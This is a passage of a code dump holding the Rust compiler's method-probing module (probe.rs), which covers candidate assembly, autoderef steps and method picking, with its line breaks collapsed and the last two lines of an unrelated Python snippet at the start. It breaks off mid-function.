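# Should print the transformed document, roughly
# <result><a><b>hello</b></a></result> (preceded by an XML declaration).
print(str(transform(doc)))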
probe.rs
use super::MethodError; use super::NoMatchData; use super::{CandidateSource, ImplSource, TraitSource}; use super::suggest; use crate::check::autoderef::{self, Autoderef}; use crate::check::FnCtxt; use crate::hir::def_id::DefId; use crate::hir::def::DefKind; use crate::namespace::Namespace; use rustc_data_structures::sync::Lrc; use rustc::hir; use rustc::lint; use rustc::session::config::nightly_options; use rustc::ty::subst::{Subst, InternalSubsts, SubstsRef}; use rustc::traits::{self, ObligationCause}; use rustc::traits::query::{CanonicalTyGoal}; use rustc::traits::query::method_autoderef::{CandidateStep, MethodAutoderefStepsResult}; use rustc::traits::query::method_autoderef::{MethodAutoderefBadTy}; use rustc::ty::{self, ParamEnvAnd, Ty, TyCtxt, ToPolyTraitRef, ToPredicate, TraitRef, TypeFoldable}; use rustc::ty::GenericParamDefKind; use rustc::infer::type_variable::{TypeVariableOrigin, TypeVariableOriginKind}; use rustc::infer::unify_key::{ConstVariableOrigin, ConstVariableOriginKind}; use rustc::util::nodemap::FxHashSet; use rustc::infer::{self, InferOk}; use rustc::infer::canonical::{Canonical, QueryResponse}; use rustc::infer::canonical::{OriginalQueryValues}; use rustc::middle::stability; use syntax::ast; use syntax::util::lev_distance::{lev_distance, find_best_match_for_name}; use syntax_pos::{DUMMY_SP, Span, symbol::Symbol}; use std::iter; use std::mem; use std::ops::Deref; use std::cmp::max; use rustc_error_codes::*; use smallvec::{smallvec, SmallVec}; use self::CandidateKind::*; pub use self::PickKind::*; /// Boolean flag used to indicate if this search is for a suggestion /// or not. If true, we can allow ambiguity and so forth. #[derive(Clone, Copy)] pub struct IsSuggestion(pub bool); struct ProbeContext<'a, 'tcx> { fcx: &'a FnCtxt<'a, 'tcx>, span: Span, mode: Mode, method_name: Option<ast::Ident>, return_type: Option<Ty<'tcx>>, /// This is the OriginalQueryValues for the steps queries /// that are answered in steps. orig_steps_var_values: OriginalQueryValues<'tcx>, steps: Lrc<Vec<CandidateStep<'tcx>>>, inherent_candidates: Vec<Candidate<'tcx>>, extension_candidates: Vec<Candidate<'tcx>>, impl_dups: FxHashSet<DefId>, /// Collects near misses when the candidate functions are missing a `self` keyword and is only /// used for error reporting static_candidates: Vec<CandidateSource>, /// When probing for names, include names that are close to the /// requested name (by Levensthein distance) allow_similar_names: bool, /// Some(candidate) if there is a private candidate private_candidate: Option<(DefKind, DefId)>, /// Collects near misses when trait bounds for type parameters are unsatisfied and is only used /// for error reporting unsatisfied_predicates: Vec<TraitRef<'tcx>>, is_suggestion: IsSuggestion, } impl<'a, 'tcx> Deref for ProbeContext<'a, 'tcx> { type Target = FnCtxt<'a, 'tcx>; fn deref(&self) -> &Self::Target { &self.fcx } } #[derive(Debug)] struct Candidate<'tcx> { // Candidates are (I'm not quite sure, but they are mostly) basically // some metadata on top of a `ty::AssocItem` (without substs). // // However, method probing wants to be able to evaluate the predicates // for a function with the substs applied - for example, if a function // has `where Self: Sized`, we don't want to consider it unless `Self` // is actually `Sized`, and similarly, return-type suggestions want // to consider the "actual" return type. // // The way this is handled is through `xform_self_ty`. 
It contains // the receiver type of this candidate, but `xform_self_ty`, // `xform_ret_ty` and `kind` (which contains the predicates) have the // generic parameters of this candidate substituted with the *same set* // of inference variables, which acts as some weird sort of "query". // // When we check out a candidate, we require `xform_self_ty` to be // a subtype of the passed-in self-type, and this equates the type // variables in the rest of the fields. // // For example, if we have this candidate: // ``` // trait Foo { // fn foo(&self) where Self: Sized; // } // ``` // // Then `xform_self_ty` will be `&'erased ?X` and `kind` will contain // the predicate `?X: Sized`, so if we are evaluating `Foo` for a // the receiver `&T`, we'll do the subtyping which will make `?X` // get the right value, then when we evaluate the predicate we'll check // if `T: Sized`. xform_self_ty: Ty<'tcx>, xform_ret_ty: Option<Ty<'tcx>>, item: ty::AssocItem, kind: CandidateKind<'tcx>, import_ids: SmallVec<[hir::HirId; 1]>, } #[derive(Debug)] enum CandidateKind<'tcx> { InherentImplCandidate(SubstsRef<'tcx>, // Normalize obligations Vec<traits::PredicateObligation<'tcx>>), ObjectCandidate, TraitCandidate(ty::TraitRef<'tcx>), WhereClauseCandidate(// Trait ty::PolyTraitRef<'tcx>), } #[derive(Debug, PartialEq, Eq, Copy, Clone)] enum ProbeResult { NoMatch, BadReturnType, Match, } #[derive(Debug, PartialEq, Clone)] pub struct Pick<'tcx> { pub item: ty::AssocItem, pub kind: PickKind<'tcx>, pub import_ids: SmallVec<[hir::HirId; 1]>, // Indicates that the source expression should be autoderef'd N times // // A = expr | *expr | **expr | ... pub autoderefs: usize, // Indicates that an autoref is applied after the optional autoderefs // // B = A | &A | &mut A pub autoref: Option<hir::Mutability>, // Indicates that the source expression should be "unsized" to a // target type. This should probably eventually go away in favor // of just coercing method receivers. // // C = B | unsize(B) pub unsize: Option<Ty<'tcx>>, } #[derive(Clone, Debug, PartialEq, Eq)] pub enum PickKind<'tcx> { InherentImplPick, ObjectPick, TraitPick, WhereClausePick(// Trait ty::PolyTraitRef<'tcx>), } pub type PickResult<'tcx> = Result<Pick<'tcx>, MethodError<'tcx>>; #[derive(PartialEq, Eq, Copy, Clone, Debug)] pub enum Mode { // An expression of the form `receiver.method_name(...)`. // Autoderefs are performed on `receiver`, lookup is done based on the // `self` argument of the method, and static methods aren't considered. MethodCall, // An expression of the form `Type::item` or `<T>::item`. // No autoderefs are performed, lookup is done based on the type each // implementation is for, and static methods are included. Path, } #[derive(PartialEq, Eq, Copy, Clone, Debug)] pub enum ProbeScope { // Assemble candidates coming only from traits in scope. TraitsInScope, // Assemble candidates coming from all traits. AllTraits, } impl<'a, 'tcx> FnCtxt<'a, 'tcx> { /// This is used to offer suggestions to users. It returns methods /// that could have been called which have the desired return /// type. Some effort is made to rule out methods that, if called, /// would result in an error (basically, the same criteria we /// would use to decide if a method is a plausible fit for /// ambiguity purposes). 
pub fn probe_for_return_type(&self, span: Span, mode: Mode, return_type: Ty<'tcx>, self_ty: Ty<'tcx>, scope_expr_id: hir::HirId) -> Vec<ty::AssocItem> { debug!("probe(self_ty={:?}, return_type={}, scope_expr_id={})", self_ty, return_type, scope_expr_id); let method_names = self.probe_op(span, mode, None, Some(return_type), IsSuggestion(true), self_ty, scope_expr_id, ProbeScope::AllTraits, |probe_cx| Ok(probe_cx.candidate_method_names())) .unwrap_or(vec![]); method_names .iter() .flat_map(|&method_name| { self.probe_op( span, mode, Some(method_name), Some(return_type), IsSuggestion(true), self_ty, scope_expr_id, ProbeScope::AllTraits, |probe_cx| probe_cx.pick() ).ok().map(|pick| pick.item) }) .collect() } pub fn probe_for_name(&self, span: Span, mode: Mode, item_name: ast::Ident, is_suggestion: IsSuggestion, self_ty: Ty<'tcx>, scope_expr_id: hir::HirId, scope: ProbeScope) -> PickResult<'tcx> { debug!("probe(self_ty={:?}, item_name={}, scope_expr_id={})", self_ty, item_name, scope_expr_id); self.probe_op(span, mode, Some(item_name), None, is_suggestion, self_ty, scope_expr_id, scope, |probe_cx| probe_cx.pick()) } fn probe_op<OP, R>( &'a self, span: Span, mode: Mode, method_name: Option<ast::Ident>, return_type: Option<Ty<'tcx>>, is_suggestion: IsSuggestion, self_ty: Ty<'tcx>, scope_expr_id: hir::HirId, scope: ProbeScope, op: OP, ) -> Result<R, MethodError<'tcx>> where OP: FnOnce(ProbeContext<'a, 'tcx>) -> Result<R, MethodError<'tcx>>, { let mut orig_values = OriginalQueryValues::default(); let param_env_and_self_ty = self.infcx.canonicalize_query( &ParamEnvAnd { param_env: self.param_env, value: self_ty }, &mut orig_values); let steps = if mode == Mode::MethodCall { self.tcx.method_autoderef_steps(param_env_and_self_ty) } else { self.infcx.probe(|_| { // Mode::Path - the deref steps is "trivial". This turns // our CanonicalQuery into a "trivial" QueryResponse. This // is a bit inefficient, but I don't think that writing // special handling for this "trivial case" is a good idea. let infcx = &self.infcx; let (ParamEnvAnd { param_env: _, value: self_ty }, canonical_inference_vars) = infcx.instantiate_canonical_with_fresh_inference_vars( span, &param_env_and_self_ty); debug!("probe_op: Mode::Path, param_env_and_self_ty={:?} self_ty={:?}", param_env_and_self_ty, self_ty); MethodAutoderefStepsResult { steps: Lrc::new(vec![CandidateStep { self_ty: self.make_query_response_ignoring_pending_obligations( canonical_inference_vars, self_ty), autoderefs: 0, from_unsafe_deref: false, unsize: false, }]), opt_bad_ty: None, reached_recursion_limit: false } }) }; // If our autoderef loop had reached the recursion limit, // report an overflow error, but continue going on with // the truncated autoderef list. if steps.reached_recursion_limit { self.probe(|_| { let ty = &steps.steps.last().unwrap_or_else(|| { span_bug!(span, "reached the recursion limit in 0 steps?") }).self_ty; let ty = self.probe_instantiate_query_response(span, &orig_values, ty) .unwrap_or_else(|_| span_bug!(span, "instantiating {:?} failed?", ty)); autoderef::report_autoderef_recursion_limit_error(self.tcx, span, ty.value); }); } // If we encountered an `_` type or an error type during autoderef, this is // ambiguous. if let Some(bad_ty) = &steps.opt_bad_ty { if is_suggestion.0 { // Ambiguity was encountered during a suggestion. Just keep going. 
debug!("ProbeContext: encountered ambiguity in suggestion"); } else if bad_ty.reached_raw_pointer && !self.tcx.features().arbitrary_self_types { // this case used to be allowed by the compiler, // so we do a future-compat lint here for the 2015 edition // (see https://github.com/rust-lang/rust/issues/46906) if self.tcx.sess.rust_2018() { span_err!(self.tcx.sess, span, E0699, "the type of this value must be known \ to call a method on a raw pointer on it"); } else { self.tcx.lint_hir( lint::builtin::TYVAR_BEHIND_RAW_POINTER, scope_expr_id, span, "type annotations needed"); } } else { // Encountered a real ambiguity, so abort the lookup. If `ty` is not // an `Err`, report the right "type annotations needed" error pointing // to it. let ty = &bad_ty.ty; let ty = self.probe_instantiate_query_response(span, &orig_values, ty) .unwrap_or_else(|_| span_bug!(span, "instantiating {:?} failed?", ty)); let ty = self.structurally_resolved_type(span, ty.value); assert_eq!(ty, self.tcx.types.err); return Err(MethodError::NoMatch(NoMatchData::new(Vec::new(), Vec::new(), Vec::new(), None, mode))); } } debug!("ProbeContext: steps for self_ty={:?} are {:?}", self_ty, steps); // this creates one big transaction so that all type variables etc // that we create during the probe process are removed later self.probe(|_| { let mut probe_cx = ProbeContext::new( self, span, mode, method_name, return_type, orig_values, steps.steps, is_suggestion, ); probe_cx.assemble_inherent_candidates(); match scope { ProbeScope::TraitsInScope => probe_cx.assemble_extension_candidates_for_traits_in_scope(scope_expr_id)?, ProbeScope::AllTraits => probe_cx.assemble_extension_candidates_for_all_traits()?, }; op(probe_cx) }) } } pub fn provide(providers: &mut ty::query::Providers<'_>) { providers.method_autoderef_steps = method_autoderef_steps; } fn method_autoderef_steps<'tcx>( tcx: TyCtxt<'tcx>, goal: CanonicalTyGoal<'tcx>, ) -> MethodAutoderefStepsResult<'tcx> { debug!("method_autoderef_steps({:?})", goal); tcx.infer_ctxt().enter_with_canonical(DUMMY_SP, &goal, |ref infcx, goal, inference_vars| { let ParamEnvAnd { param_env, value: self_ty } = goal; let mut autoderef = Autoderef::new(infcx, param_env, hir::DUMMY_HIR_ID, DUMMY_SP, self_ty) .include_raw_pointers() .silence_errors(); let mut reached_raw_pointer = false; let mut steps: Vec<_> = autoderef.by_ref() .map(|(ty, d)| { let step = CandidateStep { self_ty: infcx.make_query_response_ignoring_pending_obligations( inference_vars.clone(), ty), autoderefs: d, from_unsafe_deref: reached_raw_pointer, unsize: false, }; if let ty::RawPtr(_) = ty.kind { // all the subsequent steps will be from_unsafe_deref reached_raw_pointer = true; } step }) .collect(); let final_ty = autoderef.maybe_ambiguous_final_ty(); let opt_bad_ty = match final_ty.kind { ty::Infer(ty::TyVar(_)) | ty::Error => { Some(MethodAutoderefBadTy { reached_raw_pointer, ty: infcx.make_query_response_ignoring_pending_obligations( inference_vars, final_ty) }) } ty::Array(elem_ty, _) => { let dereferences = steps.len() - 1; steps.push(CandidateStep { self_ty: infcx.make_query_response_ignoring_pending_obligations( inference_vars, infcx.tcx.mk_slice(elem_ty)), autoderefs: dereferences, // this could be from an unsafe deref if we had // a *mut/const [T; N] from_unsafe_deref: reached_raw_pointer, unsize: true, }); None } _ => None }; debug!("method_autoderef_steps: steps={:?} opt_bad_ty={:?}", steps, opt_bad_ty); MethodAutoderefStepsResult { steps: Lrc::new(steps), opt_bad_ty: opt_bad_ty.map(Lrc::new), reached_recursion_limit: 
autoderef.reached_recursion_limit() } }) } impl<'a, 'tcx> ProbeContext<'a, 'tcx> { fn new( fcx: &'a FnCtxt<'a, 'tcx>, span: Span, mode: Mode, method_name: Option<ast::Ident>, return_type: Option<Ty<'tcx>>, orig_steps_var_values: OriginalQueryValues<'tcx>, steps: Lrc<Vec<CandidateStep<'tcx>>>, is_suggestion: IsSuggestion, ) -> ProbeContext<'a, 'tcx> { ProbeContext { fcx, span, mode, method_name, return_type, inherent_candidates: Vec::new(), extension_candidates: Vec::new(), impl_dups: FxHashSet::default(), orig_steps_var_values, steps, static_candidates: Vec::new(), allow_similar_names: false, private_candidate: None, unsatisfied_predicates: Vec::new(), is_suggestion, } } fn reset(&mut self) { self.inherent_candidates.clear(); self.extension_candidates.clear(); self.impl_dups.clear(); self.static_candidates.clear(); self.private_candidate = None; } /////////////////////////////////////////////////////////////////////////// // CANDIDATE ASSEMBLY fn push_candidate(&mut self, candidate: Candidate<'tcx>, is_inherent: bool) { let is_accessible = if let Some(name) = self.method_name { let item = candidate.item; let def_scope = self.tcx.adjust_ident_and_get_scope(name, item.container.id(), self.body_id).1; item.vis.is_accessible_from(def_scope, self.tcx) } else { true }; if is_accessible { if is_inherent { self.inherent_candidates.push(candidate); } else { self.extension_candidates.push(candidate); } } else if self.private_candidate.is_none() { self.private_candidate = Some((candidate.item.def_kind(), candidate.item.def_id)); } } fn assemble_inherent_candidates(&mut self) { let steps = self.steps.clone(); for step in steps.iter() { self.assemble_probe(&step.self_ty); } } fn assemble_probe(&mut self, self_ty: &Canonical<'tcx, QueryResponse<'tcx, Ty<'tcx>>>) { debug!("assemble_probe: self_ty={:?}", self_ty); let lang_items = self.tcx.lang_items(); match self_ty.value.value.kind { ty::Dynamic(ref data, ..) => { if let Some(p) = data.principal() { // Subtle: we can't use `instantiate_query_response` here: using it will // commit to all of the type equalities assumed by inference going through // autoderef (see the `method-probe-no-guessing` test). // // However, in this code, it is OK if we end up with an object type that is // "more general" than the object type that we are evaluating. For *every* // object type `MY_OBJECT`, a function call that goes through a trait-ref // of the form `<MY_OBJECT as SuperTraitOf(MY_OBJECT)>::func` is a valid // `ObjectCandidate`, and it should be discoverable "exactly" through one // of the iterations in the autoderef loop, so there is no problem with it // being discoverable in another one of these iterations. // // Using `instantiate_canonical_with_fresh_inference_vars` on our // `Canonical<QueryResponse<Ty<'tcx>>>` and then *throwing away* the // `CanonicalVarValues` will exactly give us such a generalization - it // will still match the original object type, but it won't pollute our // type variables in any form, so just do that! let (QueryResponse { value: generalized_self_ty, .. 
}, _ignored_var_values) = self.fcx.instantiate_canonical_with_fresh_inference_vars( self.span, &self_ty); self.assemble_inherent_candidates_from_object(generalized_self_ty); self.assemble_inherent_impl_candidates_for_type(p.def_id()); } } ty::Adt(def, _) => { self.assemble_inherent_impl_candidates_for_type(def.did); } ty::Foreign(did) => { self.assemble_inherent_impl_candidates_for_type(did); } ty::Param(p) => { self.assemble_inherent_candidates_from_param(p); } ty::Bool => { let lang_def_id = lang_items.bool_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); } ty::Char => { let lang_def_id = lang_items.char_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); } ty::Str => { let lang_def_id = lang_items.str_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); let lang_def_id = lang_items.str_alloc_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); } ty::Slice(_) => { let lang_def_id = lang_items.slice_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); let lang_def_id = lang_items.slice_u8_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); let lang_def_id = lang_items.slice_alloc_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); let lang_def_id = lang_items.slice_u8_alloc_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); } ty::RawPtr(ty::TypeAndMut { ty: _, mutbl: hir::Mutability::Not }) => { let lang_def_id = lang_items.const_ptr_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); } ty::RawPtr(ty::TypeAndMut { ty: _, mutbl: hir::Mutability::Mut }) => { let lang_def_id = lang_items.mut_ptr_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); } ty::Int(ast::IntTy::I8) => { let lang_def_id = lang_items.i8_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); } ty::Int(ast::IntTy::I16) => { let lang_def_id = lang_items.i16_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); } ty::Int(ast::IntTy::I32) => { let lang_def_id = lang_items.i32_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); } ty::Int(ast::IntTy::I64) => { let lang_def_id = lang_items.i64_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); } ty::Int(ast::IntTy::I128) => { let lang_def_id = lang_items.i128_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); } ty::Int(ast::IntTy::Isize) => { let lang_def_id = lang_items.isize_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); } ty::Uint(ast::UintTy::U8) => { let lang_def_id = lang_items.u8_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); } ty::Uint(ast::UintTy::U16) => { let lang_def_id = lang_items.u16_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); } ty::Uint(ast::UintTy::U32) => { let lang_def_id = lang_items.u32_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); } ty::Uint(ast::UintTy::U64) => { let lang_def_id = lang_items.u64_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); } ty::Uint(ast::UintTy::U128) => { let lang_def_id = lang_items.u128_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); } ty::Uint(ast::UintTy::Usize) => { let lang_def_id = lang_items.usize_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); } ty::Float(ast::FloatTy::F32) => { let lang_def_id = lang_items.f32_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); let lang_def_id = lang_items.f32_runtime_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); } ty::Float(ast::FloatTy::F64) => { let lang_def_id = 
lang_items.f64_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); let lang_def_id = lang_items.f64_runtime_impl(); self.assemble_inherent_impl_for_primitive(lang_def_id); } _ => {} } } fn assemble_inherent_impl_for_primitive(&mut self, lang_def_id: Option<DefId>) { if let Some(impl_def_id) = lang_def_id { self.assemble_inherent_impl_probe(impl_def_id); } } fn assemble_inherent_impl_candidates_for_type(&mut self, def_id: DefId) { let impl_def_ids = self.tcx.at(self.span).inherent_impls(def_id); for &impl_def_id in impl_def_ids.iter() { self.assemble_inherent_impl_probe(impl_def_id); } } fn assemble_inherent_impl_probe(&mut self, impl_def_id: DefId) { if !self.impl_dups.insert(impl_def_id) { return; // already visited } debug!("assemble_inherent_impl_probe {:?}", impl_def_id); for item in self.impl_or_trait_item(impl_def_id) { if !self.has_applicable_self(&item) { // No receiver declared. Not a candidate. self.record_static_candidate(ImplSource(impl_def_id)); continue } let (impl_ty, impl_substs) = self.impl_ty_and_substs(impl_def_id); let impl_ty = impl_ty.subst(self.tcx, impl_substs); // Determine the receiver type that the method itself expects. let xform_tys = self.xform_self_ty(&item, impl_ty, impl_substs); // We can't use normalize_associated_types_in as it will pollute the // fcx's fulfillment context after this probe is over. let cause = traits::ObligationCause::misc(self.span, self.body_id); let selcx = &mut traits::SelectionContext::new(self.fcx); let traits::Normalized { value: (xform_self_ty, xform_ret_ty), obligations } = traits::normalize(selcx, self.param_env, cause, &xform_tys); debug!("assemble_inherent_impl_probe: xform_self_ty = {:?}/{:?}", xform_self_ty, xform_ret_ty); self.push_candidate(Candidate { xform_self_ty, xform_ret_ty, item, kind: InherentImplCandidate(impl_substs, obligations), import_ids: smallvec![] }, true); } } fn assemble_inherent_candidates_from_object(&mut self, self_ty: Ty<'tcx>) { debug!("assemble_inherent_candidates_from_object(self_ty={:?})", self_ty); let principal = match self_ty.kind { ty::Dynamic(ref data, ..) => Some(data), _ => None }.and_then(|data| data.principal()).unwrap_or_else(|| { span_bug!(self.span, "non-object {:?} in assemble_inherent_candidates_from_object", self_ty) }); // It is illegal to invoke a method on a trait instance that // refers to the `Self` type. An error will be reported by // `enforce_object_limitations()` if the method refers to the // `Self` type anywhere other than the receiver. Here, we use // a substitution that replaces `Self` with the object type // itself. Hence, a `&self` method will wind up with an // argument type like `&Trait`. let trait_ref = principal.with_self_ty(self.tcx, self_ty); self.elaborate_bounds(iter::once(trait_ref), |this, new_trait_ref, item| { let new_trait_ref = this.erase_late_bound_regions(&new_trait_ref); let (xform_self_ty, xform_ret_ty) = this.xform_self_ty(&item, new_trait_ref.self_ty(), new_trait_ref.substs); this.push_candidate(Candidate { xform_self_ty, xform_ret_ty, item, kind: ObjectCandidate, import_ids: smallvec![] }, true); }); } fn assemble_inherent_candidates_from_param(&mut self, param_ty: ty::ParamTy) { // FIXME: do we want to commit to this behavior for param bounds? 
let bounds = self.param_env .caller_bounds .iter() .filter_map(|predicate| { match *predicate { ty::Predicate::Trait(ref trait_predicate) => { match trait_predicate.skip_binder().trait_ref.self_ty().kind { ty::Param(ref p) if *p == param_ty => { Some(trait_predicate.to_poly_trait_ref()) } _ => None, } } ty::Predicate::Subtype(..) | ty::Predicate::Projection(..) | ty::Predicate::RegionOutlives(..) | ty::Predicate::WellFormed(..) | ty::Predicate::ObjectSafe(..) | ty::Predicate::ClosureKind(..) | ty::Predicate::TypeOutlives(..) | ty::Predicate::ConstEvaluatable(..) => None, } }); self.elaborate_bounds(bounds, |this, poly_trait_ref, item| { let trait_ref = this.erase_late_bound_regions(&poly_trait_ref); let (xform_self_ty, xform_ret_ty) = this.xform_self_ty(&item, trait_ref.self_ty(), trait_ref.substs); // Because this trait derives from a where-clause, it // should not contain any inference variables or other // artifacts. This means it is safe to put into the // `WhereClauseCandidate` and (eventually) into the // `WhereClausePick`. assert!(!trait_ref.substs.needs_infer()); this.push_candidate(Candidate { xform_self_ty, xform_ret_ty, item, kind: WhereClauseCandidate(poly_trait_ref), import_ids: smallvec![] }, true); }); } // Do a search through a list of bounds, using a callback to actually // create the candidates. fn elaborate_bounds<F>( &mut self, bounds: impl Iterator<Item = ty::PolyTraitRef<'tcx>>, mut mk_cand: F, ) where F: for<'b> FnMut(&mut ProbeContext<'b, 'tcx>, ty::PolyTraitRef<'tcx>, ty::AssocItem), { let tcx = self.tcx; for bound_trait_ref in traits::transitive_bounds(tcx, bounds) { debug!("elaborate_bounds(bound_trait_ref={:?})", bound_trait_ref); for item in self.impl_or_trait_item(bound_trait_ref.def_id()) { if !self.has_applicable_self(&item) { self.record_static_candidate(TraitSource(bound_trait_ref.def_id())); } else { mk_cand(self, bound_trait_ref, item); } } } } fn assemble_extension_candidates_for_traits_in_scope(&mut self, expr_hir_id: hir::HirId) -> Result<(), MethodError<'tcx>> { if expr_hir_id == hir::DUMMY_HIR_ID { return Ok(()) } let mut duplicates = FxHashSet::default(); let opt_applicable_traits = self.tcx.in_scope_traits(expr_hir_id); if let Some(applicable_traits) = opt_applicable_traits { for trait_candidate in applicable_traits.iter() { let trait_did = trait_candidate.def_id; if duplicates.insert(trait_did) { let import_ids = trait_candidate.import_ids.iter().map(|node_id| self.fcx.tcx.hir().node_to_hir_id(*node_id)).collect(); let result = self.assemble_extension_candidates_for_trait(import_ids, trait_did); result?; } } } Ok(()) } fn assemble_extension_candidates_for_all_traits(&mut self) -> Result<(), MethodError<'tcx>> { let mut duplicates = FxHashSet::default(); for trait_info in suggest::all_traits(self.tcx) { if duplicates.insert(trait_info.def_id) { self.assemble_extension_candidates_for_trait(smallvec![], trait_info.def_id)?; } } Ok(()) } pub fn matches_return_type(&self, method: &ty::AssocItem, self_ty: Option<Ty<'tcx>>, expected: Ty<'tcx>) -> bool { match method.kind { ty::AssocKind::Method => { let fty = self.tcx.fn_sig(method.def_id); self.probe(|_| { let substs = self.fresh_substs_for_item(self.span, method.def_id); let fty = fty.subst(self.tcx, substs); let (fty, _) = self.replace_bound_vars_with_fresh_vars( self.span, infer::FnCall, &fty ); if let Some(self_ty) = self_ty { if self.at(&ObligationCause::dummy(), self.param_env) .sup(fty.inputs()[0], self_ty) .is_err() { return false } } self.can_sub(self.param_env, fty.output(), expected).is_ok() 
}) } _ => false, } } fn assemble_extension_candidates_for_trait(&mut self, import_ids: SmallVec<[hir::HirId; 1]>, trait_def_id: DefId) -> Result<(), MethodError<'tcx>> { debug!("assemble_extension_candidates_for_trait(trait_def_id={:?})", trait_def_id); let trait_substs = self.fresh_item_substs(trait_def_id); let trait_ref = ty::TraitRef::new(trait_def_id, trait_substs); if self.tcx.is_trait_alias(trait_def_id) { // For trait aliases, assume all super-traits are relevant. let bounds = iter::once(trait_ref.to_poly_trait_ref()); self.elaborate_bounds(bounds, |this, new_trait_ref, item| { let new_trait_ref = this.erase_late_bound_regions(&new_trait_ref); let (xform_self_ty, xform_ret_ty) = this.xform_self_ty(&item, new_trait_ref.self_ty(), new_trait_ref.substs); this.push_candidate(Candidate { xform_self_ty, xform_ret_ty, item, import_ids: import_ids.clone(), kind: TraitCandidate(new_trait_ref), }, true); }); } else { debug_assert!(self.tcx.is_trait(trait_def_id)); for item in self.impl_or_trait_item(trait_def_id) { // Check whether `trait_def_id` defines a method with suitable name. if !self.has_applicable_self(&item) { debug!("method has inapplicable self"); self.record_static_candidate(TraitSource(trait_def_id)); continue; } let (xform_self_ty, xform_ret_ty) = self.xform_self_ty(&item, trait_ref.self_ty(), trait_substs); self.push_candidate(Candidate { xform_self_ty, xform_ret_ty, item, import_ids: import_ids.clone(), kind: TraitCandidate(trait_ref), }, false); } } Ok(()) } fn candidate_method_names(&self) -> Vec<ast::Ident> { let mut set = FxHashSet::default(); let mut names: Vec<_> = self.inherent_candidates .iter() .chain(&self.extension_candidates) .filter(|candidate| { if let Some(return_ty) = self.return_type { self.matches_return_type(&candidate.item, None, return_ty) } else { true } }) .map(|candidate| candidate.item.ident) .filter(|&name| set.insert(name)) .collect(); // Sort them by the name so we have a stable result. names.sort_by_cached_key(|n| n.as_str()); names } /////////////////////////////////////////////////////////////////////////// // THE ACTUAL SEARCH fn pick(mut self) -> PickResult<'tcx> { assert!(self.method_name.is_some()); if let Some(r) = self.pick_core() { return r; } debug!("pick: actual search failed, assemble diagnotics"); let static_candidates = mem::take(&mut self.static_candidates); let private_candidate = self.private_candidate.take(); let unsatisfied_predicates = mem::take(&mut self.unsatisfied_predicates); // things failed, so lets look at all traits, for diagnostic purposes now: self.reset(); let span = self.span; let tcx = self.tcx; self.assemble_extension_candidates_for_all_traits()?; let out_of_scope_traits = match self.pick_core() { Some(Ok(p)) => vec![p.item.container.id()], //Some(Ok(p)) => p.iter().map(|p| p.item.container().id()).collect(), Some(Err(MethodError::Ambiguity(v))) => { v.into_iter() .map(|source| { match source { TraitSource(id) => id, ImplSource(impl_id) => { match tcx.trait_id_of_impl(impl_id) { Some(id) => id, None => { span_bug!(span, "found inherent method when looking at traits") } } } } }) .collect() } Some(Err(MethodError::NoMatch(NoMatchData { out_of_scope_traits: others, .. 
}))) => { assert!(others.is_empty()); vec![] } _ => vec![], }; if let Some((kind, def_id)) = private_candidate { return Err(MethodError::PrivateMatch(kind, def_id, out_of_scope_traits)); } let lev_candidate = self.probe_for_lev_candidate()?; Err(MethodError::NoMatch(NoMatchData::new(static_candidates, unsatisfied_predicates, out_of_scope_traits, lev_candidate, self.mode))) } fn pick_core(&mut self) -> Option<PickResult<'tcx>> { let steps = self.steps.clone(); // find the first step that works steps .iter() .filter(|step| { debug!("pick_core: step={:?}", step); // skip types that are from a type error or that would require dereferencing // a raw pointer !step.self_ty.references_error() && !step.from_unsafe_deref }).flat_map(|step| { let InferOk { value: self_ty, obligations: _ } = self.fcx.probe_instantiate_query_response( self.span, &self.orig_steps_var_values, &step.self_ty ).unwrap_or_else(|_| { span_bug!(self.span, "{:?} was applicable but now isn't?", step.self_ty) }); self.pick_by_value_method(step, self_ty).or_else(|| { self.pick_autorefd_method(step, self_ty, hir::Mutability::Not).or_else(|| { self.pick_autorefd_method(step, self_ty, hir::Mutability::Mut) })})}) .next() } fn pick_by_value_method( &mut self, step: &CandidateStep<'tcx>, self_ty: Ty<'tcx>, ) -> Option<PickResult<'tcx>> { //! For each type `T` in the step list, this attempts to find a //! method where the (transformed) self type is exactly `T`. We //! do however do one transformation on the adjustment: if we //! are passing a region pointer in, we will potentially //! *reborrow* it to a shorter lifetime. This allows us to //! transparently pass `&mut` pointers, in particular, without //! consuming them for their entire lifetime. if step.unsize { return None; } self.pick_method(self_ty).map(|r| { r.map(|mut pick| { pick.autoderefs = step.autoderefs; // Insert a `&*` or `&mut *` if this is a reference type: if let ty::Ref(_, _, mutbl) = step.self_ty.value.value.kind { pick.autoderefs += 1; pick.autoref = Some(mutbl); } pick }) }) } fn pick_autorefd_method( &mut self, step: &CandidateStep<'tcx>, self_ty: Ty<'tcx>, mutbl: hir::Mutability, ) -> Option<PickResult<'tcx>> { let tcx = self.tcx; // In general, during probing we erase regions. See // `impl_self_ty()` for an explanation. let region = tcx.lifetimes.re_erased; let autoref_ty = tcx.mk_ref(region, ty::TypeAndMut { ty: self_ty, mutbl }); self.pick_method(autoref_ty).map(|r| { r.map(|mut pick| { pick.autoderefs = step.autoderefs; pick.autoref = Some(mutbl); pick.unsize = step.unsize.then_some(self_ty); pick }) }) } fn pick_method(&mut self, 